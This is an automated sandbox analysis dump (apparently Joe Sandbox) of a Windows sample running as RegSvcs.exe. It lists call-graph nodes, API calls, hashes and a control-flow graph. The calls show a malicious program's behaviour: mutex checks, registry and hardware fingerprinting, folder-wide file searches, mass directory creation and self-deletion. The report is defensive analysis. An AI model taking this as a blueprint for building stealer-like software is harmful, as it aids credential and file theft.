92678->92658 92680 549a67 92679->92680 92689 549bf0 RtlAllocateHeap EnterCriticalSection LeaveCriticalSection RtlFreeHeap GetLastError 92679->92689 92680->92658 92683 549a08 __Strxfrm 92681->92683 92683->92684 92685 549d90 2 API calls 92683->92685 92684->92658 92686 549a54 92685->92686 92686->92658 92687->92654 92688->92658 92689->92684 92690 45a6b7 92691 45a6c1 92690->92691 92696 45a8d2 __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z 92690->92696 92692 41ac50 35 API calls 92691->92692 92693 45a722 92692->92693 92694 45a730 CreateMutexA 92693->92694 92695 402c90 92694->92695 92697 45a74a GetLastError 92695->92697 92883 4e4bd0 92696->92883 92698 45a75b 92697->92698 92699 45da4a 92697->92699 92702 45a766 Sleep 92698->92702 92701 402df0 std::_Throw_Cpp_error 35 API calls 92699->92701 92704 45da5b 92701->92704 92702->92702 92705 45a772 92702->92705 92706 402df0 std::_Throw_Cpp_error 35 API calls 92704->92706 92711 402cf0 std::_Throw_Cpp_error 35 API calls 92705->92711 92708 45da77 92706->92708 92710 402df0 std::_Throw_Cpp_error 35 API calls 92708->92710 92718 45da93 92710->92718 92713 45a7cd 92711->92713 92715 4c7930 104 API calls 92713->92715 92717 45a7da 92715->92717 92719 45a801 shutdown closesocket WSACleanup 92717->92719 92723 45a7f0 Sleep 92717->92723 92720 402df0 std::_Throw_Cpp_error 35 API calls 92718->92720 92722 45a830 GetPEB 92719->92722 92721 45dac9 92720->92721 92724 45a840 92722->92724 92723->92719 92723->92723 92724->92722 92884 4e71e0 2 API calls 92883->92884 92885 4e4c13 92884->92885 92886 403040 std::_Throw_Cpp_error 35 API calls 92885->92886 92887 4e4cc8 RegOpenKeyExA 92886->92887 92888 4e4ee7 92887->92888 92889 4e4e03 RegQueryValueExA 92887->92889 92892 403040 std::_Throw_Cpp_error 35 API calls 92888->92892 92890 4e4ede RegCloseKey 92889->92890 92891 4e4ebc 92889->92891 92890->92888 92893 416130 35 API calls 92891->92893 92894 4e4fb0 __fread_nolock 92892->92894 92893->92890 92895 4e4fc4 GetCurrentHwProfileA 92894->92895 92896 4e4ffd 92895->92896 92897 4e4fd8 92895->92897 92898 4e57f0 42 API calls 92896->92898 92900 416130 35 API calls 92897->92900 92899 4e5008 92898->92899 92901 4e5d00 SetupDiGetClassDevsA 92899->92901 92900->92896 92903 4e509f 92901->92903 92902 4e558c 92906 438c70 std::_Throw_Cpp_error 33 API calls 92902->92906 92903->92902 92904 41e8a0 35 API calls 92903->92904 92905 4e51ff 92904->92905 92907 418f00 std::_Throw_Cpp_error 35 API calls 92905->92907 92908 4e5531 92906->92908 95737 53b8e0 95738 53b8fa 95737->95738 95745 53b93f 95738->95745 95746 53bfe0 95738->95746 95740 533260 RtlAllocateHeap EnterCriticalSection LeaveCriticalSection RtlFreeHeap GetLastError 95743 53b932 95740->95743 95741 54a160 3 API calls 95741->95743 95743->95740 95743->95741 95743->95745 95759 53c310 10 API calls __Strxfrm 95743->95759 95760 53d690 95743->95760 95747 53bff8 95746->95747 95748 53c00e 95746->95748 95750 53bffc 95747->95750 95752 549d90 2 API calls 95747->95752 95749 53c075 95748->95749 95756 53c025 95748->95756 95751 53d690 10 API calls 95749->95751 95750->95743 95754 53c068 95751->95754 95752->95748 95753 53c08c 95753->95743 95754->95753 95766 53c170 95754->95766 95756->95754 95765 53f4f0 10 API calls 95756->95765 95759->95743 95761 53f2e0 10 API calls 95760->95761 95762 53d6ad 95761->95762 95764 53d704 95762->95764 95770 53f4f0 10 API calls 95762->95770 95764->95743 95765->95756 95767 53c187 95766->95767 95768 53c107 95766->95768 95769 53d690 10 API calls 95767->95769 95768->95743 95769->95768 95770->95764 95771 463830 95813 463879 95771->95813 95772 463891 95773 402df0 std::_Throw_Cpp_error 35 API calls 95772->95773 95774 465b82 95772->95774 95773->95772 95775 41ab20 35 API calls 95774->95775 95777 465c69 95775->95777 95776 41ab20 35 API calls 95776->95813 95778 4e6ca0 46 API calls 95777->95778 95780 465c8f 95778->95780 95779 4e6ca0 46 API calls 95779->95813 95781 465c93 CreateDirectoryA 95780->95781 95783 465cbe 95780->95783 95781->95783 95788 4667d7 95781->95788 95782 466a29 95785 402df0 std::_Throw_Cpp_error 35 API calls 95782->95785 95784 4667bc 95783->95784 95786 41b260 35 API calls 95783->95786 95784->95788 95789 4e6770 53 API calls 95784->95789 95787 466a3b 95785->95787 95811 465ce6 95786->95811 95790 4185d0 35 API calls 95787->95790 95788->95782 95792 41ab20 35 API calls 95788->95792 95789->95788 95791 466a47 95790->95791 95795 466922 95792->95795 95793 4667ad 95796 408ab0 35 API calls 95793->95796 95794 41b260 35 API calls 95794->95813 95798 439820 35 API calls 95795->95798 95796->95784 95797 4e6770 53 API calls 95797->95813 95799 46694a 95798->95799 95801 402df0 std::_Throw_Cpp_error 35 API calls 95799->95801 95800 408ab0 35 API calls 95800->95813 95805 466964 95801->95805 95802 4130f0 35 API calls 95802->95811 95803 466a23 95804 43d0a8 58 API calls 95803->95804 95804->95782 95805->95782 95805->95803 95806 403350 59 API calls 95805->95806 95806->95805 95807 41b260 35 API calls 95807->95811 95808 408ab0 35 API calls 95808->95811 95809 4163b0 35 API calls std::_Throw_Cpp_error 95809->95811 95810 41ac50 35 API calls 95810->95811 95811->95793 95811->95802 95811->95807 95811->95808 95811->95809 95811->95810 95812 416240 35 API calls 95811->95812 95815 416210 35 API calls 95811->95815 95816 4e6ca0 46 API calls 95811->95816 95817 402cf0 35 API calls std::_Throw_Cpp_error 95811->95817 95819 465ea9 CreateDirectoryA 95811->95819 95821 439820 35 API calls 95811->95821 95822 465fb8 CreateDirectoryA 95811->95822 95825 41ae20 35 API calls 95811->95825 95827 41abb0 35 API calls 95811->95827 95831 413200 35 API calls 95811->95831 95832 43d0a8 58 API calls 95811->95832 95836 402df0 35 API calls std::_Throw_Cpp_error 95811->95836 95837 41af80 35 API calls 95811->95837 95838 41b400 35 API calls 95811->95838 95839 403350 59 API calls 95811->95839 95847 415310 35 API calls std::_Throw_Cpp_error 95811->95847 95812->95811 95813->95772 95813->95776 95813->95779 95813->95794 95813->95797 95813->95800 95814 4163b0 35 API calls std::_Throw_Cpp_error 95813->95814 95818 402cf0 35 API calls std::_Throw_Cpp_error 95813->95818 95820 416210 35 API calls 95813->95820 95823 439820 35 API calls 95813->95823 95824 41ac50 35 API calls 95813->95824 95826 4e6c10 45 API calls 95813->95826 95828 41ae20 35 API calls 95813->95828 95829 416240 35 API calls 95813->95829 95830 41abb0 35 API calls 95813->95830 95833 413200 35 API calls 95813->95833 95834 4130f0 35 API calls 95813->95834 95835 43d0a8 58 API calls 95813->95835 95841 41af80 35 API calls 95813->95841 95842 41bae0 35 API calls 95813->95842 95843 41b400 35 API calls 95813->95843 95844 41b1e0 35 API calls 95813->95844 95845 403350 59 API calls 95813->95845 95846 402df0 35 API calls std::_Throw_Cpp_error 95813->95846 95814->95813 95815->95811 95816->95811 95817->95811 95818->95813 95819->95811 95820->95813 95821->95811 95822->95811 95823->95813 95824->95813 95825->95811 95826->95813 95827->95811 95828->95813 95829->95813 95830->95813 95831->95811 95832->95811 95833->95813 95834->95813 95835->95813 95836->95811 95837->95811 95838->95811 95839->95811 95841->95813 95842->95813 95843->95813 95844->95813 95845->95813 95846->95813 95847->95811 95848 44ac7f 95853 44aa55 95848->95853 95852 44acbe 95854 44aa74 95853->95854 95855 44aa87 __dosmaperr 95854->95855 95859 44aa9c 95854->95859 95869 438c60 33 API calls ___std_exception_copy 95855->95869 95857 44aa97 95857->95852 95866 442cb3 95857->95866 95860 440fae 33 API calls 95859->95860 95862 44abbc __dosmaperr 95859->95862 95861 44ac0c 95860->95861 95861->95862 95863 440fae 33 API calls 95861->95863 95862->95857 95870 438c60 33 API calls ___std_exception_copy 95862->95870 95864 44ac2a 95863->95864 95864->95862 95865 440fae 33 API calls 95864->95865 95865->95862 95871 44265b 95866->95871 95869->95857 95870->95857 95873 442667 __FrameHandler3::FrameUnwindToState 95871->95873 95872 44266e __dosmaperr 95889 438c60 33 API calls ___std_exception_copy 95872->95889 95873->95872 95874 442699 95873->95874 95880 442c45 95874->95880 95879 44267d 95879->95852 95881 43d1a7 __wsopen_s 33 API calls 95880->95881 95882 442c67 95881->95882 95883 43d18a _strftime 7 API calls 95882->95883 95884 442c74 95883->95884 95886 442c7b 95884->95886 95891 442cd3 95884->95891 95887 4426bd 95886->95887 95888 44b01a ___free_lconv_mon 2 API calls 95886->95888 95890 4426f0 LeaveCriticalSection __wsopen_s 95887->95890 95888->95887 95889->95879 95890->95879 95892 442cf0 95891->95892 95896 442d05 __dosmaperr 95892->95896 95924 44e79c 95892->95924 95896->95886 95925 44e7a8 __FrameHandler3::FrameUnwindToState 95924->95925 95952 4c7070 95982 41ae80 95952->95982 95955 4163b0 std::_Throw_Cpp_error 35 API calls 95956 4c70c8 95955->95956 95987 4e74c0 95956->95987 95959 4c7101 __fread_nolock __Strxfrm 95960 418dc0 35 API calls 95959->95960 95961 4c71af __Strxfrm 95959->95961 95960->95961 95961->95961 95962 403040 std::_Throw_Cpp_error 35 API calls 95961->95962 95963 4c7308 95962->95963 95983 433672 std::_Facet_Register 35 API calls 95982->95983 95984 41aeb5 95983->95984 95985 403040 std::_Throw_Cpp_error 35 API calls 95984->95985 95986 41af08 95985->95986 95986->95955 95988 41ae80 35 API calls 95987->95988 95989 4e7510 95988->95989 95990 439820 35 API calls 95989->95990 95991 4e75a0 95990->95991 95992 4e7614 95991->95992 95993 43d5f6 55 API calls 95991->95993 95994 402df0 std::_Throw_Cpp_error 35 API calls 95992->95994 95995 4e75b3 95993->95995 95996 4c70d8 DeleteFileA 95994->95996 95997 4393ab 40 API calls 95995->95997 95996->95959 95998 4e75bc 95997->95998 95999 43d5f6 55 API calls 95998->95999 96000 4e75cb 95999->96000 96001 418dc0 35 API calls 96000->96001 96002 4e75da 96000->96002 96001->96002 96030 4595b8 96031 4595bf 96030->96031 96032 45961a LoadLibraryA 96031->96032 96034 45962b 96032->96034 96037 459702 96032->96037 96036 4596f6 GetProcAddress 96034->96036 96036->96037 96076 408a00 96037->96076 96038 4163b0 std::_Throw_Cpp_error 35 API calls 96039 45974b 96038->96039 96082 4e7330 96039->96082 96077 4359b0 __fread_nolock 96076->96077 96078 408a3e GetModuleFileNameA 96077->96078 96079 408a72 96078->96079 96079->96079 96080 403040 std::_Throw_Cpp_error 35 API calls 96079->96080 96081 408a8a 96080->96081 96081->96038 96083 41ae80 35 API calls 96082->96083 96084 4e7383 96083->96084 96085 439820 35 API calls 96084->96085 96086 4e7413 96085->96086 96087 4e748e 96086->96087 96088 43d5f6 55 API calls 96086->96088 96089 402df0 std::_Throw_Cpp_error 35 API calls 96087->96089 96090 4e7426 96088->96090 96091 4e749d 96089->96091 96092 4393ab 40 API calls 96090->96092

                                                          Executed Functions

                                                          Function 004C00A0 Relevance: 6.9, APIs: 1, Strings: 2, Instructions: 1687COMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • SHGetFolderPathA.SHELL32(00000000,?,00000000,00000000,?,?,?,?), ref: 004C01FF
                                                            • Part of subcall function 004C6000: FindFirstFileA.KERNEL32(00000000,?,00000000), ref: 004C613F
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.4085512591.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_400000_RegSvcs.jbxd
                                                          Similarity
                                                          • API ID: FileFindFirstFolderPath
                                                          • String ID: cannot use operator[] with a string argument with $cannot use push_back() with
                                                          • API String ID: 2195519125-3306948993
                                                          • Opcode ID: ae932fdd62e77fab86c36b5235b400ed278e0452520dbd40399597b1597067d3
                                                          • Instruction ID: 70ddbce775e6b9f4390438519087f6b5abdfdd9be8d0e615cc0455d37fea4395
                                                          • Opcode Fuzzy Hash: ae932fdd62e77fab86c36b5235b400ed278e0452520dbd40399597b1597067d3
                                                          • Instruction Fuzzy Hash: FB1353B4D042688BDB65CF68C984BEEBBB4AF49304F1042DED449A7282DB746F84CF55
                                                          Function 004C6000 Relevance: 6.3, APIs: 4, Instructions: 310fileCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • FindFirstFileA.KERNEL32(00000000,?,00000000), ref: 004C613F
                                                          • FindNextFileA.KERNELBASE(00000000,00000010), ref: 004C643F
                                                          • GetLastError.KERNEL32 ref: 004C644D
                                                          • FindClose.KERNEL32(00000000), ref: 004C645D
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.4085512591.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_400000_RegSvcs.jbxd
                                                          Similarity
                                                          • API ID: Find$File$CloseErrorFirstLastNext
                                                          • String ID:
                                                          • API String ID: 819619735-0
                                                          • Opcode ID: d2049535a15a5ef7137b099a312498ac26b6cc0e4881623c14184f8926296517
                                                          • Instruction ID: afe6fe270f27518361ed143ef8865d869d8c660e8b4c9bb3a5978c93709ae348
                                                          • Opcode Fuzzy Hash: d2049535a15a5ef7137b099a312498ac26b6cc0e4881623c14184f8926296517
                                                          • Instruction Fuzzy Hash: ACD17CB4C043488FDB24CF98C994BEEBBB1BF45314F14829ED4496B392D7785A84CB59
                                                          Function 0045E140 Relevance: 17.4, APIs: 11, Instructions: 889COMMON
                                                          Download Yara Rule

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          control_flow_graph 5798 45e140-45e246 call 40b8e0 call 4132d0 call 41ab20 CreateDirectoryA 5805 45e8e1-45e8e8 5798->5805 5806 45e24c-45e250 5798->5806 5807 45f16d-45f452 call 402df0 5805->5807 5808 45e8ee-45e98a call 4132d0 call 41ab20 CreateDirectoryA 5805->5808 5809 45e252-45e26d 5806->5809 5825 45e990-45e994 5808->5825 5826 45f15e-45f168 call 402df0 5808->5826 5812 45e8a5-45e8d0 call 4163b0 call 4df030 5809->5812 5813 45e273-45e3bd call 4163b0 * 4 call 4132d0 call 41ab20 call 41ad80 call 402df0 call 4e6ca0 5809->5813 5812->5805 5832 45e8d2-45e8d9 call 4e6770 5812->5832 5870 45e3dd-45e4b0 call 4132d0 call 41ab20 call 41ad80 call 4162c0 call 402df0 * 2 call 4e6ca0 5813->5870 5871 45e3bf-45e3d7 CreateDirectoryA 5813->5871 5829 45e996-45e9b1 5825->5829 5826->5807 5833 45e9b7-45eb07 call 4163b0 * 4 call 4132d0 call 41ab20 call 41ad80 call 402df0 call 4e6ca0 5829->5833 5834 45f11f-45f14d call 4163b0 call 4d7600 5829->5834 5840 45e8de 5832->5840 5887 45eb27-45ebfa call 4132d0 call 41ab20 call 41ad80 call 4162c0 call 402df0 * 2 call 4e6ca0 5833->5887 5888 45eb09-45eb21 CreateDirectoryA 5833->5888 5834->5826 5852 45f14f-45f156 call 4e6770 5834->5852 5840->5805 5856 45f15b 5852->5856 5856->5826 5921 45e4d0-45e4d7 5870->5921 5922 45e4b2-45e4ca CreateDirectoryA 5870->5922 5871->5870 5873 45e854-45e8a0 call 402df0 * 5 5871->5873 5873->5809 5947 45ebfc-45ec14 CreateDirectoryA 5887->5947 5948 45ec1a-45ec21 5887->5948 5888->5887 5891 45f0ce-45f11a call 402df0 * 5 5888->5891 5891->5829 5925 45e5e0-45e5e4 5921->5925 5926 45e4dd-45e59d call 4132d0 call 41ab20 call 41ad80 call 402df0 call 4e6ca0 5921->5926 5922->5873 5922->5921 5929 45e5e6-45e649 call 4132d0 5925->5929 5930 45e64e-45e652 5925->5930 5985 45e5c2-45e5cc call 416290 5926->5985 5986 45e59f-45e5c0 CreateDirectoryA 5926->5986 5944 45e704-45e7f2 call 402cf0 call 4132d0 call 41ab20 call 41ae20 call 4162c0 call 402df0 * 3 call 4e6ca0 5929->5944 5936 45e654-45e6b7 call 4132d0 5930->5936 5937 45e6b9-45e6ff call 4132d0 5930->5937 5936->5944 5937->5944 6035 45e7f4-45e80c CreateDirectoryA 5944->6035 6036 45e80e-45e84e call 4163b0 * 2 call 4dff00 5944->6036 5947->5891 5947->5948 5951 45ec27-45ece7 call 4132d0 call 41ab20 call 41ad80 call 402df0 call 4e6ca0 5948->5951 5952 45ed2a-45ed2e 5948->5952 6013 45ed0c-45ed16 call 416290 5951->6013 6014 45ece9-45ed0a CreateDirectoryA 5951->6014 5957 45ed34-45edce call 4132d0 call 41ab20 call 4e6ca0 5952->5957 5958 45ee43-45ee47 5952->5958 5999 45edd0-45edf1 CreateDirectoryA 5957->5999 6000 45edf3-45ee31 call 4163b0 * 2 call 4dff00 5957->6000 5963 45eeb1-45eeb5 5958->5963 5964 45ee49-45eeac call 4132d0 5958->5964 5971 45eeb7-45ef1a call 4132d0 5963->5971 5972 45ef1c-45ef7a call 4132d0 5963->5972 5982 45ef7f-45f04e call 402cf0 call 4132d0 call 41ab20 call 41ae20 call 402df0 * 2 call 4e6ca0 5964->5982 5971->5982 5972->5982 6042 45f050-45f071 CreateDirectoryA 5982->6042 6043 45f073-45f0b9 call 4163b0 * 2 call 4dff00 5982->6043 5992 45e5d1-45e5db call 402df0 5985->5992 5986->5985 5986->5992 5992->5925 5999->6000 6004 45ee34-45ee3e 5999->6004 6000->6004 6012 45f0c9 call 402df0 6004->6012 6012->5891 6019 45ed1b-45ed25 call 402df0 6013->6019 6014->6013 6014->6019 6019->5952 6035->5873 6035->6036 6036->5873 6053 45e850 6036->6053 6042->6043 6045 45f0bf-45f0c3 6042->6045 6043->6045 6056 45f0bb 6043->6056 6045->6012 6053->5873 6056->6045
                                                          APIs
                                                            • Part of subcall function 0040B8E0: CreateDirectoryA.KERNEL32(?,00000000), ref: 0040BA08
                                                          • CreateDirectoryA.KERNEL32(?,00000000), ref: 0045E242
                                                          • CreateDirectoryA.KERNEL32(?,00000000,?,-0000004C), ref: 0045E3D3
                                                          • CreateDirectoryA.KERNEL32(?,00000000,00000000,?,?,?,-0000004C), ref: 0045E4C6
                                                          • CreateDirectoryA.KERNEL32(?,00000000,?,?,?,?,?,-0000004C), ref: 0045E5BC
                                                          • CreateDirectoryA.KERNEL32(?,00000000,00000000,?,?,?,?,?,?,?,-0000004C), ref: 0045E808
                                                          • CreateDirectoryA.KERNEL32(?,00000000), ref: 0045E986
                                                          • CreateDirectoryA.KERNEL32(?,00000000,?,-0000004C), ref: 0045EB1D
                                                          • CreateDirectoryA.KERNEL32(?,00000000,00000000,?,?,?,-0000004C), ref: 0045EC10
                                                            • Part of subcall function 004E6CA0: GetFileAttributesA.KERNEL32(?,?,00000006,00000005,00000005), ref: 004E6CFC
                                                            • Part of subcall function 004E6CA0: GetLastError.KERNEL32(?,?,00000006,00000005,00000005), ref: 004E6D07
                                                          • CreateDirectoryA.KERNEL32(?,00000000,?,?,?,?,?,-0000004C), ref: 0045ED06
                                                            • Part of subcall function 004E6CA0: std::_Throw_Cpp_error.LIBCPMT ref: 004E6D4F
                                                            • Part of subcall function 004E6CA0: std::_Throw_Cpp_error.LIBCPMT ref: 004E6D60
                                                          • CreateDirectoryA.KERNEL32(?,00000000,?,?,?,?,?,?,-0000004C), ref: 0045EDED
                                                          • CreateDirectoryA.KERNEL32(?,00000000,?,00000000,?,?,?,-0000004C), ref: 0045F06D
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.4085512591.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_400000_RegSvcs.jbxd
                                                          Similarity
                                                          • API ID: CreateDirectory$Cpp_errorThrow_std::_$AttributesErrorFileLast
                                                          • String ID:
                                                          • API String ID: 453214671-0
                                                          • Opcode ID: 92acab635771ea57e881a217a3817f7b0fb712a5626f340dd58f201ff669004b
                                                          • Instruction ID: 0e418cf523baa0a35c0a910b93c4bb77d5942d6061cfe1063ad62b245a56bb8b
                                                          • Opcode Fuzzy Hash: 92acab635771ea57e881a217a3817f7b0fb712a5626f340dd58f201ff669004b
                                                          • Instruction Fuzzy Hash: 4FA226B0D012688BCB25DB65CD95BDDBBB4AF14304F0040EED44A67282EB785F88DF5A